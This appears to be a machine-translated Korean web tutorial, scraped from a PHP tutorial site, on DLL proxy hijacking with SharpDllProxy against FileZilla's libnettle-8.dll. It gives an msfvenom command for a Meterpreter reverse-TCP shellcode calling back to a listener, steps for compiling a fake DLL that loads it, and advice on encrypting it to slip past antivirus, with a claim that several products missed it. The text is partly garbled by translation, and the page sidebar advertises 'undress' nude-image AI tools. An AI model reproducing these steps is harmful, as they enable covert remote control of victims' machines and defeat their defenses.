지역 사회
배우다
도구 라이브러리
AI 도구
여가
찾다
한국어
운영 및 유지보수 안전 DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
May 26, 2023 pm 06:10 PM
dll weiquan

DLL Hijacking

Windows 7 버전 이후 시스템은 KnowDLL을 사용하여 레지스트리 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs에 있는 DLL을 관리합니다. 이 아래의 DLL 파일은 exe 자체가 있는 디렉터리에서 호출되는 것이 금지됩니다. 시스템 디렉터리(System32) 디렉터리에서만 호출할 수 있습니다. DLL 하이재킹의 이유는 모든 DLL이 레지스트리에 기록되지 않기 때문입니다.

msfvenom이 생성한 dll을 사용하여 직접 종료하세요. DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

SharpDllProxy

이름은 양말 프록시와 비슷합니다. 도구 출처: https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/. 구체적인 구현은 이 사장님 블로그를 참고하셔도 됩니다.

머리말

먼저 동적 링크 라이브러리의 작동 원리를 이해하세요. 응용 프로그램 A가 동적 링크 라이브러리 DataFunctions.dll의 GetFunkyData() 함수를 사용하려는 경우 DataFunctions.dll 동적 링크 라이브러리를 로드해야 합니다. 이 도구는 이러한 고려 사항을 기반으로 하며 DataFunction.dll과 동일한 이름의 동적 링크 라이브러리를 생성합니다. 두 가지 기능이 있습니다. ① 모든 기능을 실제 동적 링크 라이브러리인 DataFunctions.dll로 전달하는 단축키를 만듭니다. 이름에 프록시의 출처를 기재합니다. ② 이 가짜 DataFunctions.dll에 쉘코드를 작성합니다. 첨부된 작성자의 원본 사진은 다음과 같습니다. DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

실험 과정

대상 프로그램

이 실험을 수행하는 데 시간이 좀 걸렸습니다. FileZilla 소프트웨어 등 로드해야 할 DLL을 찾는 방법은 무엇입니까? 저자가 말했듯이, 소프트웨어를 복사하면 무엇이 빠졌는지 알게 될 것입니다. 다음과 같습니다: DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

즉, 응용 프로그램을 실행하려면 DLL 파일을 로드해야 하므로 이 DLL에 대한 가짜 libnettle-8.dll을 만드세요.

쉘코드 생성

<br>
로그인 후 복사
로그인 후 복사
<br>
로그인 후 복사
로그인 후 복사

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444 -f raw > shell.bin

실험이 시작됩니다

첫 번째 SharpDllProxy 다운로드: https:/ /github.com/Flangvik/SharpDllProxy 에서 컴파일한 후 Visual Studio 2019를 사용하여 컴파일합니다. Visual Studio 2017을 사용하고 오랫동안 다양한 오류를보고했기 때문에 다른 버전을 사용하지 마십시오.

vs 아래의 SharpDllProxy를 직접 사용하여 파일 열기 --> 솔루션 생성DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

SharpDllProxy.dll을 사용하여 가짜 libnettle-8.dll 파일을 만듭니다. 위 그림의 파일에 shell.bin과 위조해야 할 Dll을 넣어주세요. 다음 명령을 실행합니다. .SharpDllProxy.exe --dll libnettle-8.dll --payload shell.binDLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

생성된 파일에는 C 파일과 dll이 포함되어 있습니다. 이 dll 파일은 원본 libnettle-8.dll 파일입니다. DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

이 C 언어 프로그램을 분석해 보겠습니다. 9행부터 494행까지 실행해야 할 모든 기능은 처리를 위해 원본 DLL로 전달됩니다. DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

497번째 줄에 쉘코드를 삽입했습니다. 이것이 유일한 키 코드입니다. 실제로 쉘코드 shell.bin을 파일에 직접 작성할 수도 있으므로 의심스러운 파일의 수가 줄어듭니다. 여기서는 VirtualAlloc 메모리 연산을 통해 바이너리 모드에서 쉘코드를 읽고 실행합니다. 이때 스스로 호랑이처럼 작전을 펼칠 수도 있고, 쉘코드를 먼저 암호화한 뒤 복호화해 실행하는 등 로딩 방식을 바꾸는 등 다양한 안티 킬링 자세를 취할 수도 있다. DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

VS를 사용하여 위의 C 파일을 컴파일합니다. 파일 메뉴에서 새로 만들기를 선택한 다음 동적 링크 라이브러리 프로젝트를 선택하고 프로젝트 이름을 libnettle-8로 지정합니다. 위의 C 파일 코드를 VS에 복사하여 컴파일DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

위 3개 파일(tmpD475.dll, libnettle-8.dll, shell.bin)을 대상 시스템으로 보냅니다. msf를 사용하여 수신한 다음 프로그램을 실행하여 세션으로 돌아갑니다. DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

가장 일반적으로 사용되는 바이러스 백신 소프트웨어 사용: 360, Tinder 및 Safe Manager가 감지되지 않았습니다. DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법

위 내용은 DLL 프록시 전달 및 Weiquan 분석을 수행하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

더보기

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
어 ass 신 크리드 그림자 : 조개 수수께끼 솔루션
2 몇 주 전 By DDD
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25 : Myrise에서 모든 것을 잠금 해제하는 방법
4 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
더보기

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

더보기

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?
7477
15
Cakephp 튜토리얼
1377
52
Steam의 계정 이름 형식은 무엇입니까?
77
11
Win11 활성화 키 영구
49
19
NYT 연결 힌트와 답변
19
32
더보기
Related knowledge
Nvgpucomp64.dll로 인해 Windows PC 게임이 중단됩니다. Nvgpucomp64.dll로 인해 Windows PC 게임이 중단됩니다. Mar 26, 2024 am 08:20 AM

Nvgpucomp64.dll로 인해 게임이 자주 충돌하는 경우 여기에 제공된 해결 방법이 도움이 될 수 있습니다. 이 문제는 일반적으로 오래되거나 손상된 그래픽 카드 드라이버, 손상된 게임 파일 등으로 인해 발생합니다. 이러한 문제를 해결하면 게임 충돌을 처리하는 데 도움이 될 수 있습니다. Nvgpucomp64.dll 파일은 NVIDIA 그래픽 카드와 연결되어 있습니다. 이 파일이 충돌하면 게임도 충돌합니다. 이는 일반적으로 LordsofttheFallen, LiesofP, RocketLeague 및 ApexLegends와 같은 게임에서 발생합니다. Nvgpucomp64.dll이 N인 경우 Windows PC에서 게임과 충돌함

Windows 시스템 디렉터리에 CoreMessaging.dll 파일이 누락되는 문제 분석 Windows 시스템 디렉터리에 CoreMessaging.dll 파일이 누락되는 문제 분석 Feb 11, 2024 pm 11:42 PM

많은 사용자는 컴퓨터를 사용하여 게임을 할 때 coremessaging.dll이 누락되었다는 메시지를 받게 됩니다. 많은 사용자는 즉시 소프트웨어나 게임에 문제가 있다고 생각할 것입니다. 컴퓨터에 dll 파일이 없으면 사용자는 coremessaging.dll 파일을 다운로드할 수 있습니다. 이 사이트에서는 Windows 시스템 디렉토리의 CoreMessaging.dll 파일이 누락되어 찾을 수 없는 문제에 대한 분석을 사용자에게 주의 깊게 소개합니다. Windows 시스템 디렉터리에 CoreMessaging.dll 파일이 없어 찾을 수 없는 문제 분석 1. CoreMessaging.dll 파일 다운로드 2.

win7 시스템에서 libcurl.dll 누락 문제를 해결하는 방법은 무엇입니까? Win7에서는 libcurl.dll 파일 솔루션을 찾을 수 없습니다. win7 시스템에서 libcurl.dll 누락 문제를 해결하는 방법은 무엇입니까? Win7에서는 libcurl.dll 파일 솔루션을 찾을 수 없습니다. Feb 12, 2024 am 08:15 AM

win7 시스템에서 libcurl.dll 누락 문제를 해결하는 방법은 무엇입니까? 일반적으로 dll 파일로 인해 일부 프로그램이 정상적으로 사용되지 않을 수 있습니다. 이 문제에 직면한 많은 사용자는 이 문제를 해결하는 방법을 모릅니다. 이러한 상황에 대해 오늘 편집자는 대부분의 사용자와 자세한 솔루션을 공유합니다. 오늘은 win7이 활용되길 바라며, 튜토리얼을 통해 많은 사용자들에게 도움이 되었으면 좋겠습니다. win7 시스템에서 누락된 libcurl.dll에 대한 해결 방법 1. libcurl.dll 파일을 다운로드합니다. 2. 다운로드 후 해당 폴더에 파일을 넣어주세요. 32비트 운영체제와 64비트 운영체제의 경우 경로는 다음과 같습니다. 32비트 Win7 운영체제의 경우 파일을 C:\Windows\SYSTEM32에 직접 복사하세요.

게임을 시작할 때 Win7에서 Skidrow.dll이 컴퓨터에 없다는 메시지가 나타나면 어떻게 해야 합니까? 게임을 시작할 때 Win7에서 Skidrow.dll이 컴퓨터에 없다는 메시지가 나타나면 어떻게 해야 합니까? Feb 15, 2024 pm 02:12 PM

많은 사용자가 컴퓨터를 사용하여 게임을 즐기고 싶어합니다. 최근 Win7 시스템의 일부 사용자는 게임을 시작할 때 Skidrow.dll 파일이 컴퓨터에 없어 시작할 수 없다는 팝업 창이 나타났다고 보고했습니다. 게임을 정상적으로 로드할 수 없습니다. 무슨 일인가요? 이 문제에 대한 대응으로 이 기사에서는 모든 사람과 공유할 수 있는 자세한 솔루션을 제공합니다. 살펴보겠습니다. 게임을 시작할 때 Win7에서 Skidrow.dll이 컴퓨터에 없다는 메시지가 나타나면 어떻게 해야 합니까? 1. Skidrow.dll 파일을 다운로드합니다. 2. 폴더의 압축을 풀고 Skidrow.dll 파일을 시스템 디렉터리에 복사합니다. 32비트 시스템: C:\WINNT\System 324비트 시스템: C:\Windows\SysWOW

vcruntime140_1.dll이 코드를 계속 실행할 수 없으면 어떻게 해야 합니까? vcruntime140_1.dll이 코드를 계속 실행할 수 없으면 어떻게 해야 합니까? Feb 11, 2024 pm 05:00 PM

vcruntime140_1.dll은 Visual C 런타임 라이브러리의 구성 요소입니다. 많은 사용자가 개발을 위해 Microsoft Visual Studio를 사용할 때 vcruntime140_1.dll이 코드를 계속 실행할 수 없다는 오류를 경험했습니다. 이 사이트에서는 vcruntime140_1.dll이 코드를 계속 실행할 수 없는 문제를 해결하는 방법을 사용자에게 주의 깊게 소개합니다. vcruntime140_1.dll이 손실되는 이유 VisualC 런타임 라이브러리 제거: VisualC를 잘못 작동하거나 업그레이드하면 런타임 라이브러리가 손실됩니다. 바이러스 감염: 악성 코드가 vc를 삭제하거나 손상시킵니다.

DLL 로딩이 실패하면 어떻게 해야 할까요? DLL 로딩이 실패하면 어떻게 해야 할까요? Jan 25, 2024 pm 05:51 PM

해결책: 1. 신뢰할 수 있는 소스에서 DLL 파일을 다시 다운로드하거나 얻습니다. 2. DLL 파일의 종속성을 확인합니다. 3. 올바른 DLL 버전을 사용하고 있는지 확인합니다. 5. DLL 파일을 등록합니다. 방화벽 및 보안 소프트웨어 설정 6. 소프트웨어 공급업체나 기술 지원팀에 문의하세요.

Master Lu는 dll 파일을 어떻게 복구합니까? 누락된 DLL 복구에 대한 Master Lu의 원클릭 튜토리얼 Master Lu는 dll 파일을 어떻게 복구합니까? 누락된 DLL 복구에 대한 Master Lu의 원클릭 튜토리얼 Mar 14, 2024 pm 07:31 PM

Master Lu는 많은 사용자가 사용하는 하드웨어 검색 도구입니다. 자세한 하드웨어 정보는 소프트웨어를 통해 볼 수 있지만 여러 드라이버를 복구할 수 있는 많은 기능이 있습니다. Master Lu가 dll 파일을 복구할 수 있는지 알고 싶어하는 사람이 많습니다. 이 문제를 해결하는 방법은 이 소프트웨어 튜토리얼의 편집자가 설명할 것입니다. 더 알고 싶은 친구는 확인해 보세요. 누락된 모든 DLL에 대한 Master Lu의 원클릭 복구에 대한 튜토리얼: 1. 먼저 Master Lu를 열고 기본 인터페이스로 들어갑니다. 2. 다음으로 오른쪽 상단의 게임 라이브러리를 클릭한 후, 오른쪽 상단의 복구를 클릭하세요. 3. 마지막 단계는 누락된 dll 파일을 복구하는 것입니다.

VCRUNTIME140.dll의 역할 이해 VCRUNTIME140.dll의 역할 이해 Dec 23, 2023 pm 11:17 PM

VCRUNTIME140.dll은 어떤 파일인가요? 일부 게임을 실행할 때 컴퓨터에서 VCRUNTIME140.dll이 손실되고 게임이 실행되지 않는 이유는 무엇입니까? 이 dll 파일은 컴퓨터의 중요한 런타임 라이브러리 파일입니다. 손실되면 많은 프로그램을 실행할 수 없습니다. VCRUNTIME140.dll이란 무엇입니까? VC++2015 런타임 라이브러리에 포함된 파일 중 하나입니다. 1. VCRUNTIME140.dll은 Microsoft Windows 시스템 작동에 필요한 중요한 파일입니다. 2. 컴퓨터의 다른 프로그램은 작동을 지원하기 위해 다른 dll 파일이 필요합니다. 3. 컴퓨터에서 프로그램을 실행하면 VCRUNTIME140.dll 파일이 없다는 메시지가 나타납니다.

See all articles